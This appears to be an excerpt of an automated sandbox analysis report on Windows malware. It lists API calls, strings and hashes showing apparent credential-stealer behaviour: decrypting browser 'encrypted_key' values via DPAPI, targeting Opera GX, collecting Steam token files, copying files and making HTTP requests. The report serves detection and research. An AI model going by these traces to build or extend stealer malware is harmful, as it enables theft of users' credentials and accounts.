                                                                                                                                                                                            • Part of subcall function 000280A1: LocalFree.KERNEL32(0002CB95,?,?,0002823B,0002CB95,?,?,?,?,?,?,?,0002CC90,?,?), ref: 000280FD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                          • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                          • API String ID: 2311102621-738592651
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00026963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000269C5
                                                                                                                                                                                            • Part of subcall function 00026963: StrCmpCA.SHLWAPI(?), ref: 000269DF
                                                                                                                                                                                            • Part of subcall function 00026963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026A0E
                                                                                                                                                                                            • Part of subcall function 00026963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00026A4D
                                                                                                                                                                                            • Part of subcall function 00026963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00026A7D
                                                                                                                                                                                            • Part of subcall function 00026963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026A88
                                                                                                                                                                                            • Part of subcall function 00026963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00026AAC
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036873
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                          • String ID: ERROR$ERROR
                                                                                                                                                                                          • API String ID: 3086566538-2579291623
                                                                                                                                                                                          • Opcode ID: f6565b7759812123ac37af109db7c412c3cff1467cc0eebfe700af49348555d0
                                                                                                                                                                                          • Instruction ID: 7160e1648d31c48a36f46949a67d6b82a2f4886f593184267b354d50ba182317
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6565b7759812123ac37af109db7c412c3cff1467cc0eebfe700af49348555d0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78011D75A00128BBCB22BBB4E8479CE37ACAF14300F544261BD25E7257EB21E94986D2
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,?), ref: 00036EFE
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4198075804-0
                                                                                                                                                                                          • Opcode ID: dda96adf8c40e676cbc418a81a77701d4b3b9eb1c06ba778cb2c361e481681dd
                                                                                                                                                                                          • Instruction ID: cae22177c074574f00be9379a22ab056cef87aff12b3c52f038c2d06519490bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: dda96adf8c40e676cbc418a81a77701d4b3b9eb1c06ba778cb2c361e481681dd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B210576900218ABCF12EF94E8459DE7BB8FF44354F518066FD05A7162D731AA8ACBA0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00034A8D), ref: 00032460
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00034A8D,00034A8D,00000000,?,?,?,00034A8D), ref: 00032487
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00034A8D), ref: 0003249E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1065093856-0
                                                                                                                                                                                          • Opcode ID: fd5ac8dbf83d5e6967d55a79f6fe830223552c7a5c9075cd154bae3a35d2d5a2
                                                                                                                                                                                          • Instruction ID: 2c3a125c4ac8546b78a5caf24e7e74d9e019180008c94faa2c4d3e7753ec4eea
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5ac8dbf83d5e6967d55a79f6fe830223552c7a5c9075cd154bae3a35d2d5a2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF05471101118BFEF126FA4FC8AEEF379CDF153A4F004150F95596191D7219D8167B1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00033DEA,00000000,?), ref: 0003226C
                                                                                                                                                                                          • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00032287
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0003228E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3183270410-0
                                                                                                                                                                                          • Opcode ID: 5a18163ff84daa1c0e7a288ad914d22b7181030e38036fbb2bed575a7070f889
                                                                                                                                                                                          • Instruction ID: ff71c5cfe437da1011ee00df128a3ec14d31f1cb7cfffe7e2dd25107307981e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a18163ff84daa1c0e7a288ad914d22b7181030e38036fbb2bed575a7070f889
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62F05475600208ABDB21AB68EC49FEF77BC9B48B14F410096F645D7190DEB4E9C5CB61
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C413095
                                                                                                                                                                                            • Part of subcall function 6C4135A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C49F688,00001000), ref: 6C4135D5
                                                                                                                                                                                            • Part of subcall function 6C4135A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4135E0
                                                                                                                                                                                            • Part of subcall function 6C4135A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C4135FD
                                                                                                                                                                                            • Part of subcall function 6C4135A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C41363F
                                                                                                                                                                                            • Part of subcall function 6C4135A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C41369F
                                                                                                                                                                                            • Part of subcall function 6C4135A0: __aulldiv.LIBCMT ref: 6C4136E4
                                                                                                                                                                                          • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C41309F
                                                                                                                                                                                            • Part of subcall function 6C435B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C4356EE,?,00000001), ref: 6C435B85
                                                                                                                                                                                            • Part of subcall function 6C435B50: EnterCriticalSection.KERNEL32(6C49F688,?,?,?,6C4356EE,?,00000001), ref: 6C435B90
                                                                                                                                                                                            • Part of subcall function 6C435B50: LeaveCriticalSection.KERNEL32(6C49F688,?,?,?,6C4356EE,?,00000001), ref: 6C435BD8
                                                                                                                                                                                            • Part of subcall function 6C435B50: GetTickCount64.KERNEL32 ref: 6C435BE4
                                                                                                                                                                                          • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C4130BE
                                                                                                                                                                                            • Part of subcall function 6C4130F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C413127
                                                                                                                                                                                            • Part of subcall function 6C4130F0: __aulldiv.LIBCMT ref: 6C413140
                                                                                                                                                                                            • Part of subcall function 6C44AB2A: __onexit.LIBCMT ref: 6C44AB30
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4291168024-0
                                                                                                                                                                                          • Opcode ID: 7013b533d688bcf94afe5abe57657d731c1210902df1602325dd74fad7c5056c
                                                                                                                                                                                          • Instruction ID: 98e06e233aab916d5101fc138c92c0ed50d448509cce88b46233920868404365
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7013b533d688bcf94afe5abe57657d731c1210902df1602325dd74fad7c5056c
                                                                                                                                                                                          • Instruction Fuzzy Hash: DFF0D622D2579496EA10EF348841AE6B774EF7B118B50571DF88853511FB2065E9C3C1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00021385), ref: 00030C91
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00021385), ref: 00030C98
                                                                                                                                                                                          • GetComputerNameA.KERNEL32(00000000,00021385), ref: 00030CAC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4203777966-0
                                                                                                                                                                                          • Opcode ID: 3d9c27fa146b631bf57b320a44b13599463f3f1ab390f78b8c922ed5a41077a6
                                                                                                                                                                                          • Instruction ID: 9b75266f18f5dea50bbba8c5f7276d8aeec4317e7758686fa95db58eb3cb6090
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d9c27fa146b631bf57b320a44b13599463f3f1ab390f78b8c922ed5a41077a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE08CB1200304ABE7408B9ADC0DF8F76ACDB84716F000125FA05D3290EAB889488B20
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX,00056853,0005684B,?,?,?), ref: 0002C98F
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00031D92: GetFileAttributesA.KERNEL32(?,?,?,0002DA7F,?,?,?), ref: 00031D99
                                                                                                                                                                                            • Part of subcall function 0002819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0002CC90,?,?), ref: 000281E5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                                          • String ID: Opera GX
                                                                                                                                                                                          • API String ID: 1719890681-3280151751
                                                                                                                                                                                          • Opcode ID: f565226b3c8f3a09302b78053de903bafa93ef037bc13de671eb6166d7b21985
                                                                                                                                                                                          • Instruction ID: 445be7ef58d0ae144bbe346d6d03baa9ada610a4f0840f9e5dc76f787d9c5c9f
                                                                                                                                                                                          • Opcode Fuzzy Hash: f565226b3c8f3a09302b78053de903bafa93ef037bc13de671eb6166d7b21985
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96B1B63290152DABDF12FBA4ED43ADE7778AF14304F910121FD0477167DB20AE5A8BA1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00027C56,?), ref: 00027B8A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00036378
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00036396
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036018
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindFirstFileA.KERNEL32(?,?), ref: 0003602F
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB4), ref: 00036050
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056AB8), ref: 0003606A
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 00036091
                                                                                                                                                                                            • Part of subcall function 00035FD1: StrCmpCA.SHLWAPI(?,00056647), ref: 000360A5
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360C2
                                                                                                                                                                                            • Part of subcall function 00035FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000360EF
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?), ref: 00036125
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD0), ref: 00036137
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 0003614A
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,00056AD4), ref: 0003615C
                                                                                                                                                                                            • Part of subcall function 00035FD1: lstrcatA.KERNEL32(?,?), ref: 00036170
                                                                                                                                                                                            • Part of subcall function 00035FD1: wsprintfA.USER32 ref: 000360D9
                                                                                                                                                                                            • Part of subcall function 00035FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00036229
                                                                                                                                                                                            • Part of subcall function 00035FD1: DeleteFileA.KERNEL32(?), ref: 0003629D
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindNextFileA.KERNEL32(?,?), ref: 000362FF
                                                                                                                                                                                            • Part of subcall function 00035FD1: FindClose.KERNEL32(?), ref: 00036313
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00036FFE
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Soft\Steam\steam_tokens.txt, xrefs: 0003700E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                          • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00027C18,?,?), ref: 0002784A
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00027874
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: 8b8d032f5cc86e6683b42bc77150acba4d18586d2d9e0cabd9503cac96aa61f5
                                                                                                                                                                                          • Instruction ID: 94a84d089856e1c4ad7b2207370b18ac304c3ba9625255b6673fe1fd80144eb8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b8d032f5cc86e6683b42bc77150acba4d18586d2d9e0cabd9503cac96aa61f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C11D071A84B15AFC724CFB8D989BAAB7F4EB44714F24086CE60ED7290E670A940C710
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • malloc.MSVCRT ref: 0003CBC9
                                                                                                                                                                                            • Part of subcall function 0003BB6C: lstrlenA.KERNEL32(?,0003CBDA,0003CC7C,00000000,06400000,00000003,00000000,0003757F,.exe,00056C5C,00056C58,00056C54,00056C50,00056C4C,00056C48,00056C44), ref: 0003BB9E
                                                                                                                                                                                            • Part of subcall function 0003BB6C: malloc.MSVCRT ref: 0003BBA6
                                                                                                                                                                                            • Part of subcall function 0003BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0003BBB1
                                                                                                                                                                                          • malloc.MSVCRT ref: 0003CC06
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2974738957-0
                                                                                                                                                                                          • Opcode ID: 55a4f4fc0973817a0c9194d3e4ca2e81283f1a971766242ed86b45c7bce13f47
                                                                                                                                                                                          • Instruction ID: 007a386e506bb2c6bea6135827981b90d544077bdd79c2e29c0ed473048da4e8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55a4f4fc0973817a0c9194d3e4ca2e81283f1a971766242ed86b45c7bce13f47
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EF0B4726052259BEB226F66EC45D9ABBDCFB447A0F094021FE0CEB252DB30DC0087B1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 362aeb04b0a845ecca87f0895b0457b14d21dd380bceeaa89ff344dae6183d6f
                                                                                                                                                                                          • Instruction ID: 70a45cebb6d08b87b814ad7cf30aa8eb543dea0c3492624aa8a37a47ecb6bf7a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 362aeb04b0a845ecca87f0895b0457b14d21dd380bceeaa89ff344dae6183d6f
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE514C72901B10ABCEF37BAE954AAF4B6DD6FB0324F1584C2F4148A1339F658D984F61
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d34658a4328f17e581cedb50a77329f0dcc36096df16a7b9b9a5255842121a89
                                                                                                                                                                                          • Instruction ID: 59ed9b08c41faf7a1b0b1d88ea14b8ea25a9ebede9d61931d607a4dc8685ab70
                                                                                                                                                                                          • Opcode Fuzzy Hash: d34658a4328f17e581cedb50a77329f0dcc36096df16a7b9b9a5255842121a89
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D3171719086259FCF26DF65E9818ADFBF6EF84310B31416EE419A7352D7308E81CB90
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FolderPathlstrcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1699248803-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,?,?,0002DA7F,?,?,?), ref: 00031D99
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHFileOperationA.SHELL32(?), ref: 00032577
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileOperation
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3080627654-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocLocal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3494564517-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                          • Opcode ID: 339b21672d8ba9e2b68c0364d62b84964d79378cdd980625ecc01bc9c64ad997
                                                                                                                                                                                          • Instruction ID: 359fbff36a3f5ec1acdbc0bca349bc0e3f76c26a8f98976ed9fc3360e80b3e4c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 339b21672d8ba9e2b68c0364d62b84964d79378cdd980625ecc01bc9c64ad997
